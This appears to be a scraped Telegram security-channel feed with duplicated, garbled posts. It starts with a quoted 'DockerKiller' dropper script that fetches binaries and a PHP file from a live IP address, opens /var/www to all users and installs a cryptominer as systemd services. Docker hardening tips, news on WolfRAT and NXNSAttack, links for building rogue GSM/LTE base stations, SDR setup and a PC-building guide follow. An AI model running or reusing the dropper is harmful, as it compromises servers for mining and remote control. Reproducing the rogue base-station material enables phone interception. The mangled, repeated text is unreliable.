π¦The relevant Code is as follows:
#!/bin/sh
rm bashd.1;
rm xm.1;
rm data.cfg.1;
rm bashd.service.1;
rm xm.service.1;
wget http://159.203.21.239/p/p.php -O privacy.php | sed 's/\r//g';
cp privacy.php /var/www/html/privacy.php;
cp privacy.php /var/www/privacy.php;
rm privacy.php;
chmod -R 777 /var/www;
wget http://159.203.21.239/p/bashd -O bashd | sed 's/\r//g';
wget http://159.203.21.239/p/xm -O xm | sed 's/\r//g';
wget http://159.203.21.239/p/data.cfg -O data.cfg | sed 's/\r//g';
wget http://159.203.21.239/p/bashd.service -O bashd.service | sed 's/\r//g';
wget http://159.203.21.239/p/xm.service -O xm.service | sed 's/\r//g';
sleep 2s;
chmod 777 bashd;
chmod 777 xm;
sleep 2s;
mv "bashd.service" "/etc/systemd/system/bashd.service";
mv "xm.service" "/etc/systemd/system/xm.service";
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl stop xm.service;
systemctl enable bashd.service;
systemctl start bashd.service;
systemctl enable xm.service;
systemctl start xm.service;
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#!/bin/sh
rm bashd.1;
rm xm.1;
rm data.cfg.1;
rm bashd.service.1;
rm xm.service.1;
wget http://159.203.21.239/p/p.php -O privacy.php | sed 's/\r//g';
cp privacy.php /var/www/html/privacy.php;
cp privacy.php /var/www/privacy.php;
rm privacy.php;
chmod -R 777 /var/www;
wget http://159.203.21.239/p/bashd -O bashd | sed 's/\r//g';
wget http://159.203.21.239/p/xm -O xm | sed 's/\r//g';
wget http://159.203.21.239/p/data.cfg -O data.cfg | sed 's/\r//g';
wget http://159.203.21.239/p/bashd.service -O bashd.service | sed 's/\r//g';
wget http://159.203.21.239/p/xm.service -O xm.service | sed 's/\r//g';
sleep 2s;
chmod 777 bashd;
chmod 777 xm;
sleep 2s;
mv "bashd.service" "/etc/systemd/system/bashd.service";
mv "xm.service" "/etc/systemd/system/xm.service";
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl stop xm.service;
systemctl enable bashd.service;
systemctl start bashd.service;
systemctl enable xm.service;
systemctl start xm.service;
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Safety advice fro m undercode against DockerKiller :
1. Modify the default parameters of the Docker Remote API service (restart the service is required)
(1) Locate tcp: //0.0.0.0.2375 in DOCKER_OPTS and modify 0.0.0.0 to 127.0.0.1
(2) Or change the default port 2375 to a custom port
2. Set authentication measures for RemoteAPI (requires restart of service)
3. Modify the running account of the Docker service (restart the service is required)
Please run the Docker account with a lower-privilege account, this can restrict the attacker from executing high-risk commands
4. Set firewall policy
If the API service needs to be accessed by other servers in normal business, you can configure the security group policy or iptables policy to allow only the specified IP to access the Docker interface.
5. Use Alibaba Cloud Shield for detection and protection
Cloud Shield situational awareness supports the detection and protection of this vulnerability, you can open and use it in the Cloud Shield console
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Safety advice fro m undercode against DockerKiller :
1. Modify the default parameters of the Docker Remote API service (restart the service is required)
(1) Locate tcp: //0.0.0.0.2375 in DOCKER_OPTS and modify 0.0.0.0 to 127.0.0.1
(2) Or change the default port 2375 to a custom port
2. Set authentication measures for RemoteAPI (requires restart of service)
3. Modify the running account of the Docker service (restart the service is required)
Please run the Docker account with a lower-privilege account, this can restrict the attacker from executing high-risk commands
4. Set firewall policy
If the API service needs to be accessed by other servers in normal business, you can configure the security group policy or iptables policy to allow only the specified IP to access the Docker interface.
5. Use Alibaba Cloud Shield for detection and protection
Cloud Shield situational awareness supports the detection and protection of this vulnerability, you can open and use it in the Cloud Shield console
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Wolf malware launches attack again
reddit-hacker-data breach
> Android device users are being attacked by the upgraded version of DenDroid of "WolfRAT". Currently, it is mainly targeted at social software such as WhatsApp, Facebook Messenger and Line.
Β» The upgraded version is mainly operated by the infamous Wolf Research. The operation level is quite amateur, mainly for code overlap, copy and paste of open source projects, class instantiation, unstable program packaging and unsafe panel operation.
π¦Operation process
The malware imitates some legitimate service processes, such as Google services, GooglePlay or Flash updates. Its operation is mainly to copy and paste a large number of public resources on the network.
π¦The consequences
>After being publicly condemned by the Danish threat intelligence company CSIS Group, Wolf Research was closed but a new organization called LokD was established , which is dedicated to the security protection of Android devices. However, due to the sharing of devices and the forgotten name of the panel, we believe that the hackers of the organization are still active and are still in the process of developing malware.
>In addition, on the C2 panel we also found a potential connection between Wolf Research and another Cyprus organization called Coralco Tech, which is also conducting technical interception research.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Wolf malware launches attack again
reddit-hacker-data breach
> Android device users are being attacked by the upgraded version of DenDroid of "WolfRAT". Currently, it is mainly targeted at social software such as WhatsApp, Facebook Messenger and Line.
Β» The upgraded version is mainly operated by the infamous Wolf Research. The operation level is quite amateur, mainly for code overlap, copy and paste of open source projects, class instantiation, unstable program packaging and unsafe panel operation.
π¦Operation process
The malware imitates some legitimate service processes, such as Google services, GooglePlay or Flash updates. Its operation is mainly to copy and paste a large number of public resources on the network.
π¦The consequences
>After being publicly condemned by the Danish threat intelligence company CSIS Group, Wolf Research was closed but a new organization called LokD was established , which is dedicated to the security protection of Android devices. However, due to the sharing of devices and the forgotten name of the panel, we believe that the hackers of the organization are still active and are still in the process of developing malware.
>In addition, on the C2 panel we also found a potential connection between Wolf Research and another Cyprus organization called Coralco Tech, which is also conducting technical interception research.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ News by Undercode >Vulnerabilities in various DNS resolvers found to allow attackers to launch denial of service attacks :
t.me/UndercodeTesting
1) A vulnerability in the DNS resolver allows attackers to create denial of service conditions through packet amplification. The vulnerability is called NXNSAttack . The attacker abused the DNS delegation mechanism . The delegation it sent contained only the name of the authoritative DNS server but not its IP address.
2) The DNS resolver cannot send a domain name query to "name", so the resolver needs to obtain the IPv4 or IPv6 address of the authoritative DNS server before it can continue to query the domain name.
3) NXNSAttack is based on this principle. The commission sent by the attacker contains the fake authoritative server name, pointing to the victim's DNS server, forcing the resolver to generate a query to the victim's DNS server. A query will be amplified dozens or even hundreds of times, launching a denial of service attack on the victim's server.
4) Many DNS software are affected, including ISC BIND (CVE-2020-8616), NLnet labs Unbound (CVE-2020-12662), PowerDNS (CVE-2020-10995), CZ.NIC Knot Resolver (CVE-2020-12667 ), Cloudflare, Google, Amazon, Microsoft, Oracle (DYN), Verisign, IBM Quad9 and ICANN.β οΈβ οΈ
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ News by Undercode >Vulnerabilities in various DNS resolvers found to allow attackers to launch denial of service attacks :
t.me/UndercodeTesting
1) A vulnerability in the DNS resolver allows attackers to create denial of service conditions through packet amplification. The vulnerability is called NXNSAttack . The attacker abused the DNS delegation mechanism . The delegation it sent contained only the name of the authoritative DNS server but not its IP address.
2) The DNS resolver cannot send a domain name query to "name", so the resolver needs to obtain the IPv4 or IPv6 address of the authoritative DNS server before it can continue to query the domain name.
3) NXNSAttack is based on this principle. The commission sent by the attacker contains the fake authoritative server name, pointing to the victim's DNS server, forcing the resolver to generate a query to the victim's DNS server. A query will be amplified dozens or even hundreds of times, launching a denial of service attack on the victim's server.
4) Many DNS software are affected, including ISC BIND (CVE-2020-8616), NLnet labs Unbound (CVE-2020-12662), PowerDNS (CVE-2020-10995), CZ.NIC Knot Resolver (CVE-2020-12667 ), Cloudflare, Google, Amazon, Microsoft, Oracle (DYN), Verisign, IBM Quad9 and ICANN.β οΈβ οΈ
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Awesome-Cellular-Hacking - from random github repo tip :
1) How to create an Evil LTE Twin/LTE Rogue BTS How to setup a 4G/LTE Evil Twin Base Station using srsLTE and a USRP SDR device.
https://medium.com/@adam.toscher/how-to-create-an-evil-lte-twin-34b0a9ce193b
2) How To Build Your Own Rogue GSM BTS For Fun and Profit "In this blog post Iβm going to explain how to create a portable GSM BTS which can be used either to create a private ( and vendor free! ) GSM network or for GSM active tapping/interception/hijacking β¦ yes, with some (relatively) cheap electronic equipment you can basically build something very similar to what the governments are using from years to perform GSM interception."
https://www.evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-fun-and-profit/
3) Practical attacks against GSM networks: Impersonation "Impersonating a cellular base station with SDR: With the flexibility, relative low cost of Software Defined Radio (SDR) and abundance of open source projects that emulate a cell tower, successfully impersonating a GSM Base Station (BTS) is not a difficult task these days."
> https://blog.blazeinfosec.com/practical-attacks-against-gsm-networks-part-1/
4) Building a Portable GSM BTS Using BladeRF/PI "I was always amazed when I read articles published by some hackers related to GSM technology. However, playing with GSM technologies was not cheap until the arrival of Software Defined Radios (SDRs), besides not being something easy to be implemented."
> https://blog.strcpy.info/2016/04/21/building-a-portable-gsm-bts-using-bladerf-raspberry-and-yatebts-the-definitive-guide/
5) rtl.sdr.com Tutorial-Analyzing GSM with-Airprobe and Wireshark "The RTL-SDR software defined radio can be used to analyze cellular phone GSM signals, using Linux based tools GR-GSM (or Airprobe) and Wireshark. This tutorial shows how to set up these tools for use with the RTL-SDR."
> https://www.rtl-sdr.com/rtl-sdr-tutorial-analyzing-gsm-with-airprobe-and-wireshark/
6) Traffic Interception for Penetration Testing Engagements "Within the penetration testing domain quite often we have to deal with different technologies and devices. Itβs important to cover all aspects of connectivity of a device being tested which is why we have built a GSM/GPRS interception capability. There are a number of different devices and systems that make use of GSM/GPRS, non-exhaustively we commonly see:"
>https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/may/gsmgprs-traffic-interception-for-penetration-testing-engagements/
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Awesome-Cellular-Hacking - from random github repo tip :
1) How to create an Evil LTE Twin/LTE Rogue BTS How to setup a 4G/LTE Evil Twin Base Station using srsLTE and a USRP SDR device.
https://medium.com/@adam.toscher/how-to-create-an-evil-lte-twin-34b0a9ce193b
2) How To Build Your Own Rogue GSM BTS For Fun and Profit "In this blog post Iβm going to explain how to create a portable GSM BTS which can be used either to create a private ( and vendor free! ) GSM network or for GSM active tapping/interception/hijacking β¦ yes, with some (relatively) cheap electronic equipment you can basically build something very similar to what the governments are using from years to perform GSM interception."
https://www.evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-fun-and-profit/
3) Practical attacks against GSM networks: Impersonation "Impersonating a cellular base station with SDR: With the flexibility, relative low cost of Software Defined Radio (SDR) and abundance of open source projects that emulate a cell tower, successfully impersonating a GSM Base Station (BTS) is not a difficult task these days."
> https://blog.blazeinfosec.com/practical-attacks-against-gsm-networks-part-1/
4) Building a Portable GSM BTS Using BladeRF/PI "I was always amazed when I read articles published by some hackers related to GSM technology. However, playing with GSM technologies was not cheap until the arrival of Software Defined Radios (SDRs), besides not being something easy to be implemented."
> https://blog.strcpy.info/2016/04/21/building-a-portable-gsm-bts-using-bladerf-raspberry-and-yatebts-the-definitive-guide/
5) rtl.sdr.com Tutorial-Analyzing GSM with-Airprobe and Wireshark "The RTL-SDR software defined radio can be used to analyze cellular phone GSM signals, using Linux based tools GR-GSM (or Airprobe) and Wireshark. This tutorial shows how to set up these tools for use with the RTL-SDR."
> https://www.rtl-sdr.com/rtl-sdr-tutorial-analyzing-gsm-with-airprobe-and-wireshark/
6) Traffic Interception for Penetration Testing Engagements "Within the penetration testing domain quite often we have to deal with different technologies and devices. Itβs important to cover all aspects of connectivity of a device being tested which is why we have built a GSM/GPRS interception capability. There are a number of different devices and systems that make use of GSM/GPRS, non-exhaustively we commonly see:"
>https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/may/gsmgprs-traffic-interception-for-penetration-testing-engagements/
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Medium
How to create an EVIL LTE Twin
Be very careful when playing with any cellular bands. Denial of service attacks can have devastating and sometimes jail worthyβ¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Installing a USRP Device on Linux :
1) sudo add-apt-repository ppa:ettusresearch/uhd
2) sudo apt-get update
3) sudo apt-get install libuhd-dev libuhd003 uhd-host
uhd_find_devices
4) cd /usr/lib/uhd/utils/
5) ./uhd_images_downloader.py
6) sudo uhd_usrp_probe
7) sudo uhd_usrp_probe
8) Example usage :
> [INFO] [UHD] linux; GNU C++ version 7.4.0; Boost_106501; UHD_3.14.1.1-release
[INFO] [B200] Detected Device: B*****
[INFO] [B200] Operating over USB 3.
[INFO] [B200] Initialize CODEC control...
[INFO] [B200] Initialize Radio control...
[INFO] [B200] Performing register loopback test...
[INFO] [B200] Register loopback test passed
[INFO] [B200] Setting master clock rate selection to 'automatic'.
[INFO] [B200] Asking for clock rate 16.000000 MHz...
[INFO] [B200] Actually got clock rate 16.000000 MHz.
_____________________________________________________
/
| Device: B-Series Device
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Installing a USRP Device on Linux :
1) sudo add-apt-repository ppa:ettusresearch/uhd
2) sudo apt-get update
3) sudo apt-get install libuhd-dev libuhd003 uhd-host
uhd_find_devices
4) cd /usr/lib/uhd/utils/
5) ./uhd_images_downloader.py
6) sudo uhd_usrp_probe
7) sudo uhd_usrp_probe
8) Example usage :
> [INFO] [UHD] linux; GNU C++ version 7.4.0; Boost_106501; UHD_3.14.1.1-release
[INFO] [B200] Detected Device: B*****
[INFO] [B200] Operating over USB 3.
[INFO] [B200] Initialize CODEC control...
[INFO] [B200] Initialize Radio control...
[INFO] [B200] Performing register loopback test...
[INFO] [B200] Register loopback test passed
[INFO] [B200] Setting master clock rate selection to 'automatic'.
[INFO] [B200] Asking for clock rate 16.000000 MHz...
[INFO] [B200] Actually got clock rate 16.000000 MHz.
_____________________________________________________
/
| Device: B-Series Device
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Troubleshooting SDR's that are running BTS software
Common issues:> the true fix β
1) Improper FW
2) Lack of proper antennas
3) Wrong cellular phone type
4) Wrong SIM
5) Not configured correctly - Mobile Country Codes (MCC) and Mobile
Network Codes (MNC)
6) Incorrect software BTS settings
7) Virtualized platform is not fast enough
8) Wrong SDR firmware
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Troubleshooting SDR's that are running BTS software
Common issues:> the true fix β
1) Improper FW
2) Lack of proper antennas
3) Wrong cellular phone type
4) Wrong SIM
5) Not configured correctly - Mobile Country Codes (MCC) and Mobile
Network Codes (MNC)
6) Incorrect software BTS settings
7) Virtualized platform is not fast enough
8) Wrong SDR firmware
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦In this tutorial I will try an teach you how to successfully build your own computer! There are many benefits to building your own computer :
t.me/UndercodeTesting
1) You get hand's on experience learning how a computer works
Its a hell of alot less expensive then buying one from a retailer
Its a hell of alot more reliable than buying one from a retailer being that you hand select QUALITY parts and put it togethor yourself.
π¦ Section #1 (What Your Going To Need)
1) A Computer Case (Something To Put All The Computer Parts Togethor In)
2) Should only run you about 200 dollars
3) Beware the cheap ones with cheap power supplies they will die in a year
4) A Mother Board (Everything Will Be Plugged Into The Mother Board)
5) A dvd Drive and a CDROM (Should Be Obvious)
6) A Hard Disk (Come In Many Different Flavors and Quality Levels, Stores All The Information In Your Computer)
7) A Video Card (Cheap Stuff, Its What Your Monitor Plugs Into)
8) IDE Controller Ribbon
Miscellaneous Accessories
π¦Next we'll take a look at many of the different options you have when buying these pieces of equipment. Your choice
may vary depending on which Operating Systems you plan on running.
π¦Section #2 (Which Brand And Model Should I Buy?)
We'll lets start with your computer case and move all the way down to Miscellaneous Accessories..
1. Computer Case
You will most certainly need an ATX style case with a quality power supply. How do you tell? Well if the case
is only 15-20 bucks theres a pretty good chance its a crappy power supply.
2. A Mother Board
I suggest a quality ASUS (ATX style to match your computer case) mother board its up to you ask your friends.
I've had bad experiences personally with FIC
mother boards.
3. A Floppy Drive and dvd ROM
Pretty inexpensive stuff, i'd suggest a Sony Floppy drive and a generic CDROM. Doesn't make too much a difference if your
concerned about getting the best price.
4. Hard Disks
π¦In this tutorial I will try an teach you how to successfully build your own computer! There are many benefits to building your own computer :
t.me/UndercodeTesting
1) You get hand's on experience learning how a computer works
Its a hell of alot less expensive then buying one from a retailer
Its a hell of alot more reliable than buying one from a retailer being that you hand select QUALITY parts and put it togethor yourself.
π¦ Section #1 (What Your Going To Need)
1) A Computer Case (Something To Put All The Computer Parts Togethor In)
2) Should only run you about 200 dollars
3) Beware the cheap ones with cheap power supplies they will die in a year
4) A Mother Board (Everything Will Be Plugged Into The Mother Board)
5) A dvd Drive and a CDROM (Should Be Obvious)
6) A Hard Disk (Come In Many Different Flavors and Quality Levels, Stores All The Information In Your Computer)
7) A Video Card (Cheap Stuff, Its What Your Monitor Plugs Into)
8) IDE Controller Ribbon
Miscellaneous Accessories
π¦Next we'll take a look at many of the different options you have when buying these pieces of equipment. Your choice
may vary depending on which Operating Systems you plan on running.
π¦Section #2 (Which Brand And Model Should I Buy?)
We'll lets start with your computer case and move all the way down to Miscellaneous Accessories..
1. Computer Case
You will most certainly need an ATX style case with a quality power supply. How do you tell? Well if the case
is only 15-20 bucks theres a pretty good chance its a crappy power supply.
2. A Mother Board
I suggest a quality ASUS (ATX style to match your computer case) mother board its up to you ask your friends.
I've had bad experiences personally with FIC
mother boards.
3. A Floppy Drive and dvd ROM
Pretty inexpensive stuff, i'd suggest a Sony Floppy drive and a generic CDROM. Doesn't make too much a difference if your
concerned about getting the best price.
4. Hard Disks
Forwarded from Backup Legal Mega
> Gets alittle tricky. If you want reliability, high speed transfers, and are willing to run Windows I suggest a Western Digital
or a Seagate ULTRA DMA-66. If your not to concerned with speed and want to run a server with Unix i'd go with a Fujitsu or
a Western Digital.
> Their farely inexpensive but only transfer in 33 megabit bursts as apposed to the DMA-66 which transfer
in 33 megabit bursts. I don't believe Unix currently supports ULTRA DMA-66, but don't quote me on that. Now there's an even faster
>transfer rate available via SCSI Hard Disk Controllers, but i'm not> about to go into setting up SCSI controllers in this tutorial.
For now we will stick with IDE Hard Disk controllers.
5. Video Cards
Video cards are cheap and if your not a gamer a plain ole gener Cirrus Logic or STB video card will do fine.
6. IDE Controller Ribbon
You'll need 2 different kinds of IDE Ribbon 2 40 pins for your CDROM and Hard Disk and Another with less pins for your floppy.
You can buy these at any local computer store or order them off the web.
7. Miscellaneous Stuff
You may be interested in adding a sound card, ethernet card, and/or 3DFX card to your system. These are relatively easy to do and
I will explain how to add card's to your mother board later.
π¦Section #3 (Where do I buy all this crap!?)
1) Well if your looking for the best prices online for computer hardware (and this is my unbiast opinion) i'd suggest going to
http://www.pricewatch.com again ask your friends maybe they know a better place. Pricewatch.com researchs the best prices
on computer hardware.> or alibaba
π¦Section #4 (Lets Assemble!)
This next part is very important so read carefully...
First things first get yourself a clean desk to work on.
1) Place your ATX stlye computer case on the desk and slide/lift the top off. Inside should be a bunch of wires coming out
of the power supply in the back and a bunch of wires coming out near the face of the box.
2) The next thing your going to want to do is place your mother board inside the case and fasten it in. Their might be
metal coverings covering the holes in the computer case were the parralel ports and serial ports on the mother board
should poke through, go ahead and poke those out with a screw drive so you can fit the mother board in snuggly. Every
Case fastens mother boards in different ways. Some use plastic pegs, some use metal screws. It will hopefully be obvious
which you have to use.
#4 Once the mother board is mounted properly you will need to fasten the floppy drive, and cdrom into the computer case.
> All computer cases store floppy drives differently there maybe a slide out container that you screw them into. You'll
have to make sure that the the floppy drive is right side up (duh!) and that the pins are facing towards the back of the
computer
> . Installing the CDROM is pretty much the same in all computer cases. Some mounting rails should have come
with your mother board. You need to fasten those to the sides of the CDROM and you should be able to slide it right in
to one of the top bays.
> Insert your Video Card. There are presently about 3 differnet forms of slots on your mother board. PCI, ISA, and AGP.
Video Cards are presently made for all 3 of them. AGP stands for "Accelrated Graphics Port" Video Cards made for this
slot are generally more high tech/performance. PCI's work and so do ISA (Althoug ISA is more Old School).
> you probably have the most of these their white and little longer than AGP. ISA, these are longggg and black, ugly.
Insert your Video Card and snug it in there firmly. Don't force it (duh).
or a Seagate ULTRA DMA-66. If your not to concerned with speed and want to run a server with Unix i'd go with a Fujitsu or
a Western Digital.
> Their farely inexpensive but only transfer in 33 megabit bursts as apposed to the DMA-66 which transfer
in 33 megabit bursts. I don't believe Unix currently supports ULTRA DMA-66, but don't quote me on that. Now there's an even faster
>transfer rate available via SCSI Hard Disk Controllers, but i'm not> about to go into setting up SCSI controllers in this tutorial.
For now we will stick with IDE Hard Disk controllers.
5. Video Cards
Video cards are cheap and if your not a gamer a plain ole gener Cirrus Logic or STB video card will do fine.
6. IDE Controller Ribbon
You'll need 2 different kinds of IDE Ribbon 2 40 pins for your CDROM and Hard Disk and Another with less pins for your floppy.
You can buy these at any local computer store or order them off the web.
7. Miscellaneous Stuff
You may be interested in adding a sound card, ethernet card, and/or 3DFX card to your system. These are relatively easy to do and
I will explain how to add card's to your mother board later.
π¦Section #3 (Where do I buy all this crap!?)
1) Well if your looking for the best prices online for computer hardware (and this is my unbiast opinion) i'd suggest going to
http://www.pricewatch.com again ask your friends maybe they know a better place. Pricewatch.com researchs the best prices
on computer hardware.> or alibaba
π¦Section #4 (Lets Assemble!)
This next part is very important so read carefully...
First things first get yourself a clean desk to work on.
1) Place your ATX stlye computer case on the desk and slide/lift the top off. Inside should be a bunch of wires coming out
of the power supply in the back and a bunch of wires coming out near the face of the box.
2) The next thing your going to want to do is place your mother board inside the case and fasten it in. Their might be
metal coverings covering the holes in the computer case were the parralel ports and serial ports on the mother board
should poke through, go ahead and poke those out with a screw drive so you can fit the mother board in snuggly. Every
Case fastens mother boards in different ways. Some use plastic pegs, some use metal screws. It will hopefully be obvious
which you have to use.
#4 Once the mother board is mounted properly you will need to fasten the floppy drive, and cdrom into the computer case.
> All computer cases store floppy drives differently there maybe a slide out container that you screw them into. You'll
have to make sure that the the floppy drive is right side up (duh!) and that the pins are facing towards the back of the
computer
> . Installing the CDROM is pretty much the same in all computer cases. Some mounting rails should have come
with your mother board. You need to fasten those to the sides of the CDROM and you should be able to slide it right in
to one of the top bays.
> Insert your Video Card. There are presently about 3 differnet forms of slots on your mother board. PCI, ISA, and AGP.
Video Cards are presently made for all 3 of them. AGP stands for "Accelrated Graphics Port" Video Cards made for this
slot are generally more high tech/performance. PCI's work and so do ISA (Althoug ISA is more Old School).
> you probably have the most of these their white and little longer than AGP. ISA, these are longggg and black, ugly.
Insert your Video Card and snug it in there firmly. Don't force it (duh).
Forwarded from Backup Legal Mega
> . Most hard disks are shipped in
single mode, but if you want to run multiple hard disks (which we won't discuss) you need to set the jumpers differently.
Jumpers are little metal prongs connected with little jumpers that complete a connection.
π¦ You figure it out. Anyway
1) you got your hard disk in now its time to hook up the power supplies. The hard disk and the CDROM have similar power supp
lies. 3 or 4 prong. Hook those funny looking cords coming out of the back of the power supply into your CDROM and Hard
Disk.
2) Theres a smaller one that hooks into your floppy it should be obvious. Theres a big power supply (the biggest one
in the lot usually made of white plastic) It fits into a slot on your mother board, it is the main power supply to your
mother board. Its kind of tricky to get in so be careful.
3) Now that you have your Power Supplies hooked up you'll need to connect your Periphrials to your Mother Board. Use the IDE
Controller Ribbon I know you all have. Hey one end goes to your CDROM (make sure the red line on the ribbon "pin 1" is
matched up with the first pin on the back of your CDROM) and the other end goes to your mother board (same deal). The
same goes for your hard disk and yoru floppy. Figure it out its not that difficult. You'll know you did something wrong
when you get a floppy disk fail on boot.
4) Finishing touches. Don't forget to connect those nasty wires coming out from behind the face of your computer case to
your mother board. They control the on, off, reset, hard disk activity, and power switch. Every mother board is different
so i hope you have a manual with your mother board. Most specify with 2 or 3 character paraphrases that make no sense.
For Example "PWR SWT" = Power Switch "RST SWT" = Reset Switch. Or even more vague than that.
π¦Section #5 (Testing 1, 2, 3)
> Ok your ready to give it a whirl, you'll need to get in your system bios. The "DEL" key should usually get you in.
Get it to autodetect your hard disk. Accept the Setting and Save your Configurations. Install Your OS and your ready to go.
That easy!! Ha! you'll prolly have lots of trouble theres a million resources online to help you. Get to it.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
single mode, but if you want to run multiple hard disks (which we won't discuss) you need to set the jumpers differently.
Jumpers are little metal prongs connected with little jumpers that complete a connection.
π¦ You figure it out. Anyway
1) you got your hard disk in now its time to hook up the power supplies. The hard disk and the CDROM have similar power supp
lies. 3 or 4 prong. Hook those funny looking cords coming out of the back of the power supply into your CDROM and Hard
Disk.
2) Theres a smaller one that hooks into your floppy it should be obvious. Theres a big power supply (the biggest one
in the lot usually made of white plastic) It fits into a slot on your mother board, it is the main power supply to your
mother board. Its kind of tricky to get in so be careful.
3) Now that you have your Power Supplies hooked up you'll need to connect your Periphrials to your Mother Board. Use the IDE
Controller Ribbon I know you all have. Hey one end goes to your CDROM (make sure the red line on the ribbon "pin 1" is
matched up with the first pin on the back of your CDROM) and the other end goes to your mother board (same deal). The
same goes for your hard disk and yoru floppy. Figure it out its not that difficult. You'll know you did something wrong
when you get a floppy disk fail on boot.
4) Finishing touches. Don't forget to connect those nasty wires coming out from behind the face of your computer case to
your mother board. They control the on, off, reset, hard disk activity, and power switch. Every mother board is different
so i hope you have a manual with your mother board. Most specify with 2 or 3 character paraphrases that make no sense.
For Example "PWR SWT" = Power Switch "RST SWT" = Reset Switch. Or even more vague than that.
π¦Section #5 (Testing 1, 2, 3)
> Ok your ready to give it a whirl, you'll need to get in your system bios. The "DEL" key should usually get you in.
Get it to autodetect your hard disk. Accept the Setting and Save your Configurations. Install Your OS and your ready to go.
That easy!! Ha! you'll prolly have lots of trouble theres a million resources online to help you. Get to it.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
π¦ this tutorial teach you how to successfully build your own computer! There are many benefits to building your own computer